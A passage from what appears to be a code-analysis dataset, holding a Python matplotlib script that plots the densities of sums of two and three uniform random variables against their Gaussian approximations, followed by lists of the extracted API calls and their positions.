rpa.helpers.transfer_learning.utils import get_sourcetarget_split_motorimagery, get_sourcetarget_split_p300\n'), ((1432, 1496), 'rpa.helpers.transfer_learning.utils.get_sourcetarget_split_motorimagery', 'get_sourcetarget_split_motorimagery', (['source', 'target', 'ncovs_train'], {}), '(source, target, ncovs_train)\n', (1467, 1496), False, 'from rpa.helpers.transfer_learning.utils import get_sourcetarget_split_motorimagery, get_sourcetarget_split_p300\n'), ((1834, 1851), 'numpy.unique', 'np.unique', (['y_test'], {}), '(y_test)\n', (1843, 1851), True, 'import numpy as np\n'), ((1900, 1917), 'numpy.unique', 'np.unique', (['y_pred'], {}), '(y_pred)\n', (1909, 1917), True, 'import numpy as np\n'), ((2580, 2597), 'numpy.unique', 'np.unique', (['y_test'], {}), '(y_test)\n', (2589, 2597), True, 'import numpy as np\n'), ((2646, 2663), 'numpy.unique', 'np.unique', (['y_pred'], {}), '(y_pred)\n', (2655, 2663), True, 'import numpy as np\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import math
from scipy.stats import norm
from matplotlib import rc
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=False)
rc('mathtext', fontset='cm')
# auxiliar function for plot ticks of equal length in x and y axis despite its scales.
def convert_display_to_data_coordinates(transData, length=10):
# create a transform which will take from display to data coordinates
inv = transData.inverted()
# transform from display coordinates to data coordinates in x axis
data_coords = inv.transform([(0, 0), (length, 0)])
# get the length of the segment in data units
yticks_len = data_coords[1, 0] - data_coords[0, 0]
# transform from display coordinates to data coordinates in y axis
data_coords = inv.transform([(0, 0), (0, length)])
# get the length of the segment in data units
xticks_len = data_coords[1, 1] - data_coords[0, 1]
return xticks_len, yticks_len
#####################################
# PARAMETROS - Puede ser modificado #
#####################################
# distribuciรณn uniforme en (0, T)
T = 0.5
# range of x of interest
xmin = -0.1
xmax = 3.5 * T
ymin = 0
ymax = 1 / T
#####################
# FIN DE PARAMETROS #
#####################
# parametros de las densidades de x_i: media y varianza
eta = T / 2
var = (T ** 2) / 12
# cantidad de variables aleatorias x_i a sumar
na = 2
nb = 3
# media y varianza de la suma
eta2 = na * eta
var2 = na * var
eta3 = nb * eta
var3 = nb * var
# pdf teorica
x = np.linspace(xmin, xmax, 300)
f2 = norm.pdf(x, eta2, math.sqrt(var2))
f3 = norm.pdf(x, eta3, math.sqrt(var3))
# axis parameters
dx = 0.1
xmin_ax = xmin - dx
xmax_ax = xmax + 2 * dx
dy = 0.2
ymin_ax = ymin - dy
ymax_ax = ymax + 0.4
# parรกmetros de la figura
# length of the ticks for all subplot (6 pixels)
display_length = 6 # in pixels
# x ticks labels margin
xtm = -0.23
ytm = -0.07
# font size
fontsize = 14
fig = plt.figure(0, figsize=(10, 3), frameon=False)
ax = plt.subplot2grid((1, 6), (0, 0), rowspan=1, colspan=2)
plt.xlim(xmin_ax, xmax_ax)
plt.ylim(ymin_ax, ymax_ax)
# axis arrows
plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
plt.annotate("", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
# f(x)
plt.plot([0, T], [1/T, 1/T], 'k', linewidth=2)
plt.plot([T, T], [0, 1/T], 'k', linewidth=2)
plt.plot([0, 0], [0, 1/T], 'k', linewidth=2)
plt.plot([xmin, 0], [0, 0], 'k', linewidth=2)
plt.plot([T, xmax], [0, 0], 'k', linewidth=2)
# labels
# xlables
plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')
plt.text(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')
# ylabels
plt.text(ytm, 1/T, '$\dfrac{1}{T}$', fontsize=fontsize, ha='right', va='center')
plt.text(-ytm, ymax_ax, '$f(x)$', fontsize=fontsize, ha='left', va='center')
plt.axis('off')
fig = plt.figure(0, figsize=(10, 3), frameon=False)
ax = plt.subplot2grid((1, 6), (0, 2), rowspan=1, colspan=2)
plt.xlim(xmin_ax, xmax_ax)
plt.ylim(ymin_ax, ymax_ax)
# horizontal and vertical ticks length
xtl, ytl = convert_display_to_data_coordinates(ax.transData, length=display_length)
# axis arrows
plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
plt.annotate("", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
# f2(x)
plt.plot([0, T], [0, 1/T], 'k', linewidth=2, label='$f(x)*f(x)$')
plt.plot([T, 2 * T], [1/T, 0], 'k', linewidth=2)
plt.plot([xmin, 0], [0, 0], 'k', linewidth=2)
plt.plot([2*T, xmax], [0, 0], 'k', linewidth=2)
# aproximaciรณn gaussiana
plt.plot(x, f2, 'r', linewidth=2, zorder=0, label='$N\left(T,\,\dfrac{T^2}{6}\\right)$')
# ticks
plt.plot([T, T], [0, xtl], 'k')
plt.plot([2*T, 2*T], [0, xtl], 'k')
plt.plot([0, ytl], [1/T, 1/T], 'k')
# labels
# xlables
plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')
plt.text(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')
plt.text(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(2*T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')
# ylabels
plt.text(ytm, 1/T, '$\dfrac{1}{T}$', fontsize=fontsize, ha='right', va='center')
#plt.text(-ytm, ymax_ax, '$f_2(x)$', fontsize=fontsize, ha='left', va='center')
leg = leg = plt.legend(loc=(0.45, 0.7), frameon=False, fontsize=12)
plt.axis('off')
fig = plt.figure(0, figsize=(10, 3), frameon=False)
ax = plt.subplot2grid((1, 6), (0, 4), rowspan=1, colspan=2)
plt.xlim(xmin_ax, xmax_ax)
plt.ylim(ymin_ax, ymax_ax)
# horizontal and vertical ticks length
xtl, ytl = convert_display_to_data_coordinates(ax.transData, length=display_length)
# axis arrows
plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
plt.annotate("", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',
arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))
# f3(x)
c = 2 * (T ** 3)
xa = np.linspace(0, T, 100)
plt.plot(xa, np.polyval([1, 0, 0], xa) / c, 'k', linewidth=2, label='$f(x)*f(x)*f(x)$')
xa = np.linspace(T, 2 * T, 100)
plt.plot(xa, np.polyval([-2, 6 * T, -3 * (T ** 2)], xa) / c, 'k', linewidth=2)
xa = np.linspace(2 * T, 3 * T, 100)
plt.plot(xa, np.polyval([1, -6 * T, 9 * (T ** 2)], xa) / c, 'k', linewidth=2)
plt.plot([xmin, 0], [0, 0], 'k', linewidth=2)
plt.plot([3*T, xmax], [0, 0], 'k', linewidth=2)
# aproximaciรณn gaussiana
plt.plot(x, f3, 'r', linewidth=2, zorder=0, label='$N\left(\dfrac{3T}{2},\,\dfrac{T^2}{4}\\right)$')
# ticks
plt.plot([T, T], [0, xtl], 'k')
plt.plot([2*T, 2*T], [0, xtl], 'k')
plt.plot([3*T, 3*T], [0, xtl], 'k')
plt.plot([0, ytl], [1/T, 1/T], 'k')
plt.plot([0, ytl], [1/(2*T), 1/(2*T)], 'k')
# labels
# xlables
plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')
plt.text(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')
plt.text(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(2*T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')
plt.text(3*T, xtm, '$3T$', fontsize=fontsize, ha='center', va='baseline')
# ylabels
plt.text(ytm, 1/T, '$\dfrac{1}{T}$', fontsize=fontsize, ha='right', va='center')
plt.text(ytm, 1/(2*T), '$\dfrac{1}{2T}$', fontsize=fontsize, ha='right', va='center')
#plt.text(-ytm, ymax_ax, '$f_3(x)$', fontsize=fontsize, ha='left', va='center')
leg = leg = plt.legend(loc=(0.28, 0.7), frameon=False, fontsize=12)
plt.axis('off')
# save as eps image
plt.savefig('example_7_15.pdf', bbox_inches='tight')
plt.show()
|
[
"matplotlib.pyplot.xlim",
"matplotlib.rc",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.ylim",
"math.sqrt",
"numpy.polyval",
"matplotlib.pyplot.subplot2grid",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.text",
"matplotlib.pyplot.figure",
"numpy.linspace",
"matplotlib.pyplot.savefig"
] |
[((171, 195), 'matplotlib.rc', 'rc', (['"""text"""'], {'usetex': '(False)'}), "('text', usetex=False)\n", (173, 195), False, 'from matplotlib import rc\n'), ((196, 224), 'matplotlib.rc', 'rc', (['"""mathtext"""'], {'fontset': '"""cm"""'}), "('mathtext', fontset='cm')\n", (198, 224), False, 'from matplotlib import rc\n'), ((1544, 1572), 'numpy.linspace', 'np.linspace', (['xmin', 'xmax', '(300)'], {}), '(xmin, xmax, 300)\n', (1555, 1572), True, 'import numpy as np\n'), ((1965, 2010), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {'figsize': '(10, 3)', 'frameon': '(False)'}), '(0, figsize=(10, 3), frameon=False)\n', (1975, 2010), True, 'import matplotlib.pyplot as plt\n'), ((2016, 2070), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(1, 6)', '(0, 0)'], {'rowspan': '(1)', 'colspan': '(2)'}), '((1, 6), (0, 0), rowspan=1, colspan=2)\n', (2032, 2070), True, 'import matplotlib.pyplot as plt\n'), ((2072, 2098), 'matplotlib.pyplot.xlim', 'plt.xlim', (['xmin_ax', 'xmax_ax'], {}), '(xmin_ax, xmax_ax)\n', (2080, 2098), True, 'import matplotlib.pyplot as plt\n'), ((2099, 2125), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ymin_ax', 'ymax_ax'], {}), '(ymin_ax, ymax_ax)\n', (2107, 2125), True, 'import matplotlib.pyplot as plt\n'), ((2533, 2583), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, T]', '[1 / T, 1 / T]', '"""k"""'], {'linewidth': '(2)'}), "([0, T], [1 / T, 1 / T], 'k', linewidth=2)\n", (2541, 2583), True, 'import matplotlib.pyplot as plt\n'), ((2580, 2626), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, T]', '[0, 1 / T]', '"""k"""'], {'linewidth': '(2)'}), "([T, T], [0, 1 / T], 'k', linewidth=2)\n", (2588, 2626), True, 'import matplotlib.pyplot as plt\n'), ((2625, 2671), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 0]', '[0, 1 / T]', '"""k"""'], {'linewidth': '(2)'}), "([0, 0], [0, 1 / T], 'k', linewidth=2)\n", (2633, 2671), True, 'import matplotlib.pyplot as plt\n'), ((2670, 2715), 'matplotlib.pyplot.plot', 'plt.plot', (['[xmin, 0]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([xmin, 0], [0, 0], 'k', linewidth=2)\n", (2678, 2715), True, 'import matplotlib.pyplot as plt\n'), ((2716, 2761), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, xmax]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([T, xmax], [0, 0], 'k', linewidth=2)\n", (2724, 2761), True, 'import matplotlib.pyplot as plt\n'), ((2782, 2857), 'matplotlib.pyplot.text', 'plt.text', (['xmax_ax', 'xtm', '"""$x$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')\n", (2790, 2857), True, 'import matplotlib.pyplot as plt\n'), ((2858, 2928), 'matplotlib.pyplot.text', 'plt.text', (['T', 'xtm', '"""$T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')\n", (2866, 2928), True, 'import matplotlib.pyplot as plt\n'), ((2929, 3000), 'matplotlib.pyplot.text', 'plt.text', (['ytm', 'xtm', '"""$0$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')\n", (2937, 3000), True, 'import matplotlib.pyplot as plt\n'), ((3011, 3099), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / T)', '"""$\\\\dfrac{1}{T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / T, '$\\\\dfrac{1}{T}$', fontsize=fontsize, ha='right', va=\n 'center')\n", (3019, 3099), True, 'import matplotlib.pyplot as plt\n'), ((3092, 3168), 'matplotlib.pyplot.text', 'plt.text', (['(-ytm)', 'ymax_ax', '"""$f(x)$"""'], {'fontsize': 'fontsize', 'ha': '"""left"""', 'va': '"""center"""'}), "(-ytm, ymax_ax, '$f(x)$', fontsize=fontsize, ha='left', va='center')\n", (3100, 3168), True, 'import matplotlib.pyplot as plt\n'), ((3170, 3185), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3178, 3185), True, 'import matplotlib.pyplot as plt\n'), ((3194, 3239), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {'figsize': '(10, 3)', 'frameon': '(False)'}), '(0, figsize=(10, 3), frameon=False)\n', (3204, 3239), True, 'import matplotlib.pyplot as plt\n'), ((3245, 3299), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(1, 6)', '(0, 2)'], {'rowspan': '(1)', 'colspan': '(2)'}), '((1, 6), (0, 2), rowspan=1, colspan=2)\n', (3261, 3299), True, 'import matplotlib.pyplot as plt\n'), ((3301, 3327), 'matplotlib.pyplot.xlim', 'plt.xlim', (['xmin_ax', 'xmax_ax'], {}), '(xmin_ax, xmax_ax)\n', (3309, 3327), True, 'import matplotlib.pyplot as plt\n'), ((3328, 3354), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ymin_ax', 'ymax_ax'], {}), '(ymin_ax, ymax_ax)\n', (3336, 3354), True, 'import matplotlib.pyplot as plt\n'), ((3887, 3954), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, T]', '[0, 1 / T]', '"""k"""'], {'linewidth': '(2)', 'label': '"""$f(x)*f(x)$"""'}), "([0, T], [0, 1 / T], 'k', linewidth=2, label='$f(x)*f(x)$')\n", (3895, 3954), True, 'import matplotlib.pyplot as plt\n'), ((3953, 4003), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, 2 * T]', '[1 / T, 0]', '"""k"""'], {'linewidth': '(2)'}), "([T, 2 * T], [1 / T, 0], 'k', linewidth=2)\n", (3961, 4003), True, 'import matplotlib.pyplot as plt\n'), ((4002, 4047), 'matplotlib.pyplot.plot', 'plt.plot', (['[xmin, 0]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([xmin, 0], [0, 0], 'k', linewidth=2)\n", (4010, 4047), True, 'import matplotlib.pyplot as plt\n'), ((4048, 4097), 'matplotlib.pyplot.plot', 'plt.plot', (['[2 * T, xmax]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([2 * T, xmax], [0, 0], 'k', linewidth=2)\n", (4056, 4097), True, 'import matplotlib.pyplot as plt\n'), ((4121, 4217), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'f2', '"""r"""'], {'linewidth': '(2)', 'zorder': '(0)', 'label': '"""$N\\\\left(T,\\\\,\\\\dfrac{T^2}{6}\\\\right)$"""'}), "(x, f2, 'r', linewidth=2, zorder=0, label=\n '$N\\\\left(T,\\\\,\\\\dfrac{T^2}{6}\\\\right)$')\n", (4129, 4217), True, 'import matplotlib.pyplot as plt\n'), ((4219, 4250), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, T]', '[0, xtl]', '"""k"""'], {}), "([T, T], [0, xtl], 'k')\n", (4227, 4250), True, 'import matplotlib.pyplot as plt\n'), ((4251, 4290), 'matplotlib.pyplot.plot', 'plt.plot', (['[2 * T, 2 * T]', '[0, xtl]', '"""k"""'], {}), "([2 * T, 2 * T], [0, xtl], 'k')\n", (4259, 4290), True, 'import matplotlib.pyplot as plt\n'), ((4287, 4326), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, ytl]', '[1 / T, 1 / T]', '"""k"""'], {}), "([0, ytl], [1 / T, 1 / T], 'k')\n", (4295, 4326), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4418), 'matplotlib.pyplot.text', 'plt.text', (['xmax_ax', 'xtm', '"""$x$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')\n", (4351, 4418), True, 'import matplotlib.pyplot as plt\n'), ((4419, 4490), 'matplotlib.pyplot.text', 'plt.text', (['ytm', 'xtm', '"""$0$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')\n", (4427, 4490), True, 'import matplotlib.pyplot as plt\n'), ((4491, 4561), 'matplotlib.pyplot.text', 'plt.text', (['T', 'xtm', '"""$T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')\n", (4499, 4561), True, 'import matplotlib.pyplot as plt\n'), ((4562, 4637), 'matplotlib.pyplot.text', 'plt.text', (['(2 * T)', 'xtm', '"""$2T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(2 * T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')\n", (4570, 4637), True, 'import matplotlib.pyplot as plt\n'), ((4646, 4734), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / T)', '"""$\\\\dfrac{1}{T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / T, '$\\\\dfrac{1}{T}$', fontsize=fontsize, ha='right', va=\n 'center')\n", (4654, 4734), True, 'import matplotlib.pyplot as plt\n'), ((4820, 4875), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(0.45, 0.7)', 'frameon': '(False)', 'fontsize': '(12)'}), '(loc=(0.45, 0.7), frameon=False, fontsize=12)\n', (4830, 4875), True, 'import matplotlib.pyplot as plt\n'), ((4877, 4892), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (4885, 4892), True, 'import matplotlib.pyplot as plt\n'), ((4901, 4946), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {'figsize': '(10, 3)', 'frameon': '(False)'}), '(0, figsize=(10, 3), frameon=False)\n', (4911, 4946), True, 'import matplotlib.pyplot as plt\n'), ((4952, 5006), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(1, 6)', '(0, 4)'], {'rowspan': '(1)', 'colspan': '(2)'}), '((1, 6), (0, 4), rowspan=1, colspan=2)\n', (4968, 5006), True, 'import matplotlib.pyplot as plt\n'), ((5008, 5034), 'matplotlib.pyplot.xlim', 'plt.xlim', (['xmin_ax', 'xmax_ax'], {}), '(xmin_ax, xmax_ax)\n', (5016, 5034), True, 'import matplotlib.pyplot as plt\n'), ((5035, 5061), 'matplotlib.pyplot.ylim', 'plt.ylim', (['ymin_ax', 'ymax_ax'], {}), '(ymin_ax, ymax_ax)\n', (5043, 5061), True, 'import matplotlib.pyplot as plt\n'), ((5616, 5638), 'numpy.linspace', 'np.linspace', (['(0)', 'T', '(100)'], {}), '(0, T, 100)\n', (5627, 5638), True, 'import numpy as np\n'), ((5732, 5758), 'numpy.linspace', 'np.linspace', (['T', '(2 * T)', '(100)'], {}), '(T, 2 * T, 100)\n', (5743, 5758), True, 'import numpy as np\n'), ((5843, 5873), 'numpy.linspace', 'np.linspace', (['(2 * T)', '(3 * T)', '(100)'], {}), '(2 * T, 3 * T, 100)\n', (5854, 5873), True, 'import numpy as np\n'), ((5953, 5998), 'matplotlib.pyplot.plot', 'plt.plot', (['[xmin, 0]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([xmin, 0], [0, 0], 'k', linewidth=2)\n", (5961, 5998), True, 'import matplotlib.pyplot as plt\n'), ((5999, 6048), 'matplotlib.pyplot.plot', 'plt.plot', (['[3 * T, xmax]', '[0, 0]', '"""k"""'], {'linewidth': '(2)'}), "([3 * T, xmax], [0, 0], 'k', linewidth=2)\n", (6007, 6048), True, 'import matplotlib.pyplot as plt\n'), ((6072, 6181), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'f3', '"""r"""'], {'linewidth': '(2)', 'zorder': '(0)', 'label': '"""$N\\\\left(\\\\dfrac{3T}{2},\\\\,\\\\dfrac{T^2}{4}\\\\right)$"""'}), "(x, f3, 'r', linewidth=2, zorder=0, label=\n '$N\\\\left(\\\\dfrac{3T}{2},\\\\,\\\\dfrac{T^2}{4}\\\\right)$')\n", (6080, 6181), True, 'import matplotlib.pyplot as plt\n'), ((6182, 6213), 'matplotlib.pyplot.plot', 'plt.plot', (['[T, T]', '[0, xtl]', '"""k"""'], {}), "([T, T], [0, xtl], 'k')\n", (6190, 6213), True, 'import matplotlib.pyplot as plt\n'), ((6214, 6253), 'matplotlib.pyplot.plot', 'plt.plot', (['[2 * T, 2 * T]', '[0, xtl]', '"""k"""'], {}), "([2 * T, 2 * T], [0, xtl], 'k')\n", (6222, 6253), True, 'import matplotlib.pyplot as plt\n'), ((6250, 6289), 'matplotlib.pyplot.plot', 'plt.plot', (['[3 * T, 3 * T]', '[0, xtl]', '"""k"""'], {}), "([3 * T, 3 * T], [0, xtl], 'k')\n", (6258, 6289), True, 'import matplotlib.pyplot as plt\n'), ((6286, 6325), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, ytl]', '[1 / T, 1 / T]', '"""k"""'], {}), "([0, ytl], [1 / T, 1 / T], 'k')\n", (6294, 6325), True, 'import matplotlib.pyplot as plt\n'), ((6322, 6373), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, ytl]', '[1 / (2 * T), 1 / (2 * T)]', '"""k"""'], {}), "([0, ytl], [1 / (2 * T), 1 / (2 * T)], 'k')\n", (6330, 6373), True, 'import matplotlib.pyplot as plt\n'), ((6386, 6461), 'matplotlib.pyplot.text', 'plt.text', (['xmax_ax', 'xtm', '"""$x$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='right', va='baseline')\n", (6394, 6461), True, 'import matplotlib.pyplot as plt\n'), ((6462, 6533), 'matplotlib.pyplot.text', 'plt.text', (['ytm', 'xtm', '"""$0$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""baseline"""'}), "(ytm, xtm, '$0$', fontsize=fontsize, ha='right', va='baseline')\n", (6470, 6533), True, 'import matplotlib.pyplot as plt\n'), ((6534, 6604), 'matplotlib.pyplot.text', 'plt.text', (['T', 'xtm', '"""$T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(T, xtm, '$T$', fontsize=fontsize, ha='center', va='baseline')\n", (6542, 6604), True, 'import matplotlib.pyplot as plt\n'), ((6605, 6680), 'matplotlib.pyplot.text', 'plt.text', (['(2 * T)', 'xtm', '"""$2T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(2 * T, xtm, '$2T$', fontsize=fontsize, ha='center', va='baseline')\n", (6613, 6680), True, 'import matplotlib.pyplot as plt\n'), ((6679, 6754), 'matplotlib.pyplot.text', 'plt.text', (['(3 * T)', 'xtm', '"""$3T$"""'], {'fontsize': 'fontsize', 'ha': '"""center"""', 'va': '"""baseline"""'}), "(3 * T, xtm, '$3T$', fontsize=fontsize, ha='center', va='baseline')\n", (6687, 6754), True, 'import matplotlib.pyplot as plt\n'), ((6763, 6851), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / T)', '"""$\\\\dfrac{1}{T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / T, '$\\\\dfrac{1}{T}$', fontsize=fontsize, ha='right', va=\n 'center')\n", (6771, 6851), True, 'import matplotlib.pyplot as plt\n'), ((6844, 6939), 'matplotlib.pyplot.text', 'plt.text', (['ytm', '(1 / (2 * T))', '"""$\\\\dfrac{1}{2T}$"""'], {'fontsize': 'fontsize', 'ha': '"""right"""', 'va': '"""center"""'}), "(ytm, 1 / (2 * T), '$\\\\dfrac{1}{2T}$', fontsize=fontsize, ha=\n 'right', va='center')\n", (6852, 6939), True, 'import matplotlib.pyplot as plt\n'), ((7023, 7078), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '(0.28, 0.7)', 'frameon': '(False)', 'fontsize': '(12)'}), '(loc=(0.28, 0.7), frameon=False, fontsize=12)\n', (7033, 7078), True, 'import matplotlib.pyplot as plt\n'), ((7080, 7095), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (7088, 7095), True, 'import matplotlib.pyplot as plt\n'), ((7117, 7169), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""example_7_15.pdf"""'], {'bbox_inches': '"""tight"""'}), "('example_7_15.pdf', bbox_inches='tight')\n", (7128, 7169), True, 'import matplotlib.pyplot as plt\n'), ((7170, 7180), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7178, 7180), True, 'import matplotlib.pyplot as plt\n'), ((1596, 1611), 'math.sqrt', 'math.sqrt', (['var2'], {}), '(var2)\n', (1605, 1611), False, 'import math\n'), ((1636, 1651), 'math.sqrt', 'math.sqrt', (['var3'], {}), '(var3)\n', (1645, 1651), False, 'import math\n'), ((5652, 5677), 'numpy.polyval', 'np.polyval', (['[1, 0, 0]', 'xa'], {}), '([1, 0, 0], xa)\n', (5662, 5677), True, 'import numpy as np\n'), ((5772, 5812), 'numpy.polyval', 'np.polyval', (['[-2, 6 * T, -3 * T ** 2]', 'xa'], {}), '([-2, 6 * T, -3 * T ** 2], xa)\n', (5782, 5812), True, 'import numpy as np\n'), ((5887, 5926), 'numpy.polyval', 'np.polyval', (['[1, -6 * T, 9 * T ** 2]', 'xa'], {}), '([1, -6 * T, 9 * T ** 2], xa)\n', (5897, 5926), True, 'import numpy as np\n')]
|